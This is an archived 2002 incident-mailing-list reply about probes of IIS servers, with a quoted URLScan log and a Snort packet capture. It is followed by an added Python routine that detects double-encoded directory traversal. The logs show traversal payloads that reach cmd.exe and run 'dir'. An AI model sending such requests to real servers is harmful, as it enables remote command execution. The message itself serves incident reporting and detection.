Re: Unicode worm?
From: John Sage (jsage@finchhaven.com)
Date: 08/22/02
- Previous message: Turner, Keith (Contractor): "Unicode worm?"
- In reply to:(deleted message) Soeren Ziehe: "Re: Unicode worm?"
- Next in thread: Larsen, Colin: "RE: Unicode worm?"
Date: Wed, 21 Aug 2002 21:01:00 -0700
From: John Sage <jsage@finchhaven.com>
To: incidents@securityfocus.com
Soeren, Keith:
On Wed, Aug 21, 2002 at 07:43:00PM +0200, Soeren Ziehe wrote:
> In article <51F912F2A6CDD111810A00600811BA42024D8BE9@TEA05> [21 Aug 02]
> Turner, Keith (Contractor) <TurnerL@tea-emh1.army.mil> wrote:
>
> > [08-21-2002 - 00:56:11] Client at x.x.x.x: URL normalization was
> > not complete after one pass. Request will be rejected. Site
> > Instance='1', Raw URL='/scripts/..%255c%255c../winnt/system32/cmd.e
> > xe'
>
> I'm seeing the same requests.
I've recently seen several single-payload packet probes of the form:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-02:27:44.357277 216.181.16.2:4723 -> 12.82.129.71:80
TCP TTL:110 TOS:0x0 ID:26376 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0x36AEB784 Ack: 0x71FD0774 Win: 0x2238 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 5c%5c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 0D 0A 69 72 0D 0A c+dir..ir..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
These have source IP's _not_ within my class B, or A; very quick,
typically six to nine packets for the total transaction, and they're gone.
- John
--
"You are in a little maze of twisty passages, all different."
PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800 4EF6 5FC8 F23D 35A4 F705
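
The check behind the quoted "URL normalization was not complete after one pass" log entry, sketched as an added example that is not part of the message above and is not URLScan's own code. The function names, the finding labels and the five-pass cap are assumptions made for illustration; the two sample URLs are the ones quoted in this thread.

```python
import re
from urllib.parse import unquote

MAX_PASSES = 5  # assumption for this sketch: stop decoding after five passes

# The two request URLs quoted in this thread (the first rejoined across the
# e-mail line wrap in the quoted log entry).
URLSCAN_RAW_URL = "/scripts/..%255c%255c../winnt/system32/cmd.exe"
SNORT_PAYLOAD_URL = "/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir"


def normalize(path):
    """Percent-decode until the string stops changing.

    Returns (decoded_path, passes), where passes counts the decode passes
    that actually changed the string.
    """
    passes = 0
    while passes < MAX_PASSES:
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path, passes = decoded, passes + 1
    return path, passes


def classify(raw_url):
    """Return the set of findings for one raw request URL."""
    path = raw_url.split("?", 1)[0]          # ignore the query string
    decoded, passes = normalize(path)
    findings = set()
    if passes > 1:                           # still encoded after one pass
        findings.add("multi-pass-encoding")
    # Windows accepts '\' as a path separator, so split on both.
    segments = re.split(r"[\\/]+", decoded)
    if ".." in segments:
        findings.add("traversal")
    if segments[-1].lower() == "cmd.exe":
        findings.add("cmd.exe")
    return findings


if __name__ == "__main__":
    for url in (URLSCAN_RAW_URL, SNORT_PAYLOAD_URL, "/docs/a%20b.html"):
        print(url, sorted(classify(url)))
```

The `%255c` form needs two decode passes to reach a backslash, so it trips the multi-pass check; the `%5c` form in the packet capture is fully decoded after one pass and is caught only by the traversal check on the decoded path.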